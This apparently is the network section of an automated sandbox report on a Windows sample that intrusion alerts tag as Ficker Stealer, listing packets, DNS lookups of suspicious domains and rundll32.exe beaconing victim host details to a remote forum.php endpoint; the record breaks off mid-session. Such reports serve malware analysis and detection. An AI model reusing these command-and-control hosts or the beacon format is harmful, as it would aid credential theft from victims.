                                        07/09/21-03:07:44.821475TCP2031074ET TROJAN Win32/Ficker Stealer Activity804917295.213.179.67192.168.2.22
                                        07/09/21-03:07:44.822108TCP2031132ET TROJAN Win32/Ficker Stealer Activity M34917280192.168.2.2295.213.179.67
                                        07/09/21-03:07:46.763546TCP2031074ET TROJAN Win32/Ficker Stealer Activity804917895.213.179.67192.168.2.22
                                        07/09/21-03:07:46.764728TCP2031132ET TROJAN Win32/Ficker Stealer Activity M34917880192.168.2.2295.213.179.67

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jul 9, 2021 03:07:35.667702913 CEST4916580192.168.2.2250.19.92.227
                                        Jul 9, 2021 03:07:35.768351078 CEST804916550.19.92.227192.168.2.22
                                        Jul 9, 2021 03:07:35.768608093 CEST4916580192.168.2.2250.19.92.227
                                        Jul 9, 2021 03:07:35.791934967 CEST4916580192.168.2.2250.19.92.227
                                        Jul 9, 2021 03:07:35.892631054 CEST804916550.19.92.227192.168.2.22
                                        Jul 9, 2021 03:07:41.760555983 CEST4916580192.168.2.2250.19.92.227
                                        Jul 9, 2021 03:07:42.207412004 CEST4916680192.168.2.2277.222.42.67
                                        Jul 9, 2021 03:07:42.260952950 CEST804916677.222.42.67192.168.2.22
                                        Jul 9, 2021 03:07:42.261214972 CEST4916680192.168.2.2277.222.42.67
                                        Jul 9, 2021 03:07:42.262625933 CEST4916680192.168.2.2277.222.42.67
                                        Jul 9, 2021 03:07:42.315808058 CEST804916677.222.42.67192.168.2.22
                                        Jul 9, 2021 03:07:42.331255913 CEST804916677.222.42.67192.168.2.22
                                        Jul 9, 2021 03:07:42.331413984 CEST4916680192.168.2.2277.222.42.67
                                        Jul 9, 2021 03:07:42.645384073 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.681991100 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.682125092 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.683511972 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.719840050 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.873905897 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.873929977 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.873940945 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.873954058 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.873965025 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.873975992 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.874003887 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.874016047 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.874027014 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.874042034 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.874120951 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.874665976 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.874681950 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.910140038 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.910195112 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.910222054 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.910248041 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.910274982 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.910295963 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.910322905 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.910350084 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.910376072 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.910404921 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.910432100 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.910464048 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.910471916 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.910494089 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.910515070 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.910517931 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.910528898 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.910537004 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.910542011 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.910543919 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.910568953 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.910582066 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.910604954 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.910605907 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.910629988 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.910634995 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.910660982 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.910665989 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.910687923 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.910713911 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.910731077 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.910739899 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.911206007 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.946764946 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.946821928 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.946861029 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.946901083 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.946948051 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.946990013 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.947006941 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.947029114 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.947046995 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.947056055 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.947068930 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.947088957 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.947108030 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.947161913 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.947170973 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.947217941 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.947249889 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.947261095 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.947278976 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.947297096 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.947298050 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.947335958 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.947338104 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.947360992 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.947374105 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.947411060 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.947448969 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.947453022 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.947487116 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.947489023 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.947494030 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.947535992 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.947546959 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.947580099 CEST80491678.211.241.0192.168.2.22
                                        Jul 9, 2021 03:07:42.947587013 CEST4916780192.168.2.228.211.241.0
                                        Jul 9, 2021 03:07:42.947598934 CEST4916780192.168.2.228.211.241.0

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jul 9, 2021 03:07:35.627645969 CEST5219753192.168.2.228.8.8.8
                                        Jul 9, 2021 03:07:35.640475988 CEST53521978.8.8.8192.168.2.22
                                        Jul 9, 2021 03:07:41.856858015 CEST5309953192.168.2.228.8.8.8
                                        Jul 9, 2021 03:07:42.202471972 CEST53530998.8.8.8192.168.2.22
                                        Jul 9, 2021 03:07:42.351741076 CEST5283853192.168.2.228.8.8.8
                                        Jul 9, 2021 03:07:42.641100883 CEST53528388.8.8.8192.168.2.22
                                        Jul 9, 2021 03:07:43.941922903 CEST6120053192.168.2.228.8.8.8
                                        Jul 9, 2021 03:07:43.956505060 CEST53612008.8.8.8192.168.2.22
                                        Jul 9, 2021 03:07:44.263042927 CEST4954853192.168.2.228.8.8.8
                                        Jul 9, 2021 03:07:44.608213902 CEST53495488.8.8.8192.168.2.22
                                        Jul 9, 2021 03:07:44.609189034 CEST4954853192.168.2.228.8.8.8
                                        Jul 9, 2021 03:07:44.623220921 CEST53495488.8.8.8192.168.2.22
                                        Jul 9, 2021 03:07:46.274094105 CEST5562753192.168.2.228.8.8.8
                                        Jul 9, 2021 03:07:46.559499025 CEST53556278.8.8.8192.168.2.22

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Jul 9, 2021 03:07:35.627645969 CEST192.168.2.228.8.8.80x26aeStandard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                        Jul 9, 2021 03:07:41.856858015 CEST192.168.2.228.8.8.80x80acStandard query (0)sudepallon.comA (IP address)IN (0x0001)
                                        Jul 9, 2021 03:07:42.351741076 CEST192.168.2.228.8.8.80x51f2Standard query (0)srand04rf.ruA (IP address)IN (0x0001)
                                        Jul 9, 2021 03:07:43.941922903 CEST192.168.2.228.8.8.80x79daStandard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                        Jul 9, 2021 03:07:44.263042927 CEST192.168.2.228.8.8.80xa9f6Standard query (0)pospvisis.comA (IP address)IN (0x0001)
                                        Jul 9, 2021 03:07:44.609189034 CEST192.168.2.228.8.8.80xa9f6Standard query (0)pospvisis.comA (IP address)IN (0x0001)
                                        Jul 9, 2021 03:07:46.274094105 CEST192.168.2.228.8.8.80x6352Standard query (0)pospvisis.comA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Jul 9, 2021 03:07:35.640475988 CEST8.8.8.8192.168.2.220x26aeNo error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                                        Jul 9, 2021 03:07:35.640475988 CEST8.8.8.8192.168.2.220x26aeNo error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                        Jul 9, 2021 03:07:35.640475988 CEST8.8.8.8192.168.2.220x26aeNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.19.92.227A (IP address)IN (0x0001)
                                        Jul 9, 2021 03:07:35.640475988 CEST8.8.8.8192.168.2.220x26aeNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.175.90A (IP address)IN (0x0001)
                                        Jul 9, 2021 03:07:35.640475988 CEST8.8.8.8192.168.2.220x26aeNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.121.178A (IP address)IN (0x0001)
                                        Jul 9, 2021 03:07:35.640475988 CEST8.8.8.8192.168.2.220x26aeNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.243.175.83A (IP address)IN (0x0001)
                                        Jul 9, 2021 03:07:35.640475988 CEST8.8.8.8192.168.2.220x26aeNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.16.216.118A (IP address)IN (0x0001)
                                        Jul 9, 2021 03:07:35.640475988 CEST8.8.8.8192.168.2.220x26aeNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.136.132A (IP address)IN (0x0001)
                                        Jul 9, 2021 03:07:35.640475988 CEST8.8.8.8192.168.2.220x26aeNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.224.49A (IP address)IN (0x0001)
                                        Jul 9, 2021 03:07:35.640475988 CEST8.8.8.8192.168.2.220x26aeNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.16.220.248A (IP address)IN (0x0001)
                                        Jul 9, 2021 03:07:42.202471972 CEST8.8.8.8192.168.2.220x80acNo error (0)sudepallon.com77.222.42.67A (IP address)IN (0x0001)
                                        Jul 9, 2021 03:07:42.641100883 CEST8.8.8.8192.168.2.220x51f2No error (0)srand04rf.ru8.211.241.0A (IP address)IN (0x0001)
                                        Jul 9, 2021 03:07:43.956505060 CEST8.8.8.8192.168.2.220x79daNo error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                                        Jul 9, 2021 03:07:43.956505060 CEST8.8.8.8192.168.2.220x79daNo error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                        Jul 9, 2021 03:07:43.956505060 CEST8.8.8.8192.168.2.220x79daNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.211.162A (IP address)IN (0x0001)
                                        Jul 9, 2021 03:07:43.956505060 CEST8.8.8.8192.168.2.220x79daNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.16.246.238A (IP address)IN (0x0001)
                                        Jul 9, 2021 03:07:43.956505060 CEST8.8.8.8192.168.2.220x79daNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.16.226.23A (IP address)IN (0x0001)
                                        Jul 9, 2021 03:07:43.956505060 CEST8.8.8.8192.168.2.220x79daNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.16.216.118A (IP address)IN (0x0001)
                                        Jul 9, 2021 03:07:43.956505060 CEST8.8.8.8192.168.2.220x79daNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.243.175.83A (IP address)IN (0x0001)
                                        Jul 9, 2021 03:07:43.956505060 CEST8.8.8.8192.168.2.220x79daNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.165.85A (IP address)IN (0x0001)
                                        Jul 9, 2021 03:07:43.956505060 CEST8.8.8.8192.168.2.220x79daNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.88.121A (IP address)IN (0x0001)
                                        Jul 9, 2021 03:07:43.956505060 CEST8.8.8.8192.168.2.220x79daNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.19.92.227A (IP address)IN (0x0001)
                                        Jul 9, 2021 03:07:44.608213902 CEST8.8.8.8192.168.2.220xa9f6No error (0)pospvisis.com95.213.179.67A (IP address)IN (0x0001)
                                        Jul 9, 2021 03:07:44.623220921 CEST8.8.8.8192.168.2.220xa9f6No error (0)pospvisis.com95.213.179.67A (IP address)IN (0x0001)
                                        Jul 9, 2021 03:07:46.559499025 CEST8.8.8.8192.168.2.220x6352No error (0)pospvisis.com95.213.179.67A (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • api.ipify.org
                                        • sudepallon.com
                                        • srand04rf.ru

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.224916550.19.92.22780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:35.791934967 CEST0OUTGET / HTTP/1.1
                                        Accept: */*
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: api.ipify.org
                                        Cache-Control: no-cache


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.224916677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:42.262625933 CEST1OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 105
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 30 2e 30 2e 30 2e 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=0.0.0.0&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:42.331255913 CEST1INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:43 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 33 38 0d 0a 47 48 53 54 41 52 68 41 45 67 34 4f 43 6b 42 56 56 51 6b 49 47 78 51 65 53 6b 34 49 48 46 51 49 44 31 56 4e 45 68 77 51 43 52 34 63 45 42 45 4a 56 42 38 43 48 77 63 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 38GHSTARhAEg4OCkBVVQkIGxQeSk4IHFQID1VNEhwQCR4cEBEJVB8CHwc=0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        10192.168.2.224917577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:45.547195911 CEST301OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:45.613605976 CEST301INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:47 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4d 54 47 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cMTGNARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        100192.168.2.224926577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:20.834779978 CEST406OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:20.902245998 CEST406INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:22 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 46 5a 41 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cFZAUARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        101192.168.2.224926677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        102192.168.2.224926777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        103192.168.2.224926877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        104192.168.2.224926977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        105192.168.2.224927077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        106192.168.2.224927177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        107192.168.2.224927277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        108192.168.2.224927377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        109192.168.2.224927477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        11192.168.2.224917677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:45.926341057 CEST302OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:45.997448921 CEST302INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:47 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 5a 48 53 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cZHSAARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        110192.168.2.224927577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        111192.168.2.224927677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        112192.168.2.224927777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        113192.168.2.224927877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        114192.168.2.224927977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        115192.168.2.224928077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        116192.168.2.224928177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        117192.168.2.224928277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        118192.168.2.224928377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        119192.168.2.224928477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        12192.168.2.224917777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:46.310456038 CEST307OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:46.379241943 CEST307INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:47 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 5a 46 55 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cZFUAARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        120192.168.2.224928577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        121192.168.2.224928677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        122192.168.2.224928777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        123192.168.2.224928877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
